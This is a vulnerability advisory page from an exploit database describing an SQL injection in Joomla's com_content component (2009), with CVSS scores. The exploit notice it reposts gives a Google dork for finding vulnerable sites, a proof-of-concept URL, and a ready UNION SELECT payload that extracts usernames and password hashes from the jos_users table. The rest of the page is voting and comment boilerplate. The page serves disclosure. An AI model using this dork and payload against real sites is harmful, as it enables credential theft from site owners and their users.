Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

2009-08-10 / 2009-08-11
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------------------------- Joomla Component com_content SQL Injection Vulnerabity ------------------------------------------------------------------------------------------- Author : unknown_styler Dork : inurl:com_content POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL} Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/* ------------------------------------------------------------------------------------------------------------------------------------ Greetings : h4ck-y0u.org side note: <name>P&#195;&#161;gina de contenido</name> <author>Projecte Joomla!</author> <creationDate>July 2004</creationDate> <copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright> <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>1.0.0</version>

References:

http://www.milw0rm.com/exploits/6025


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top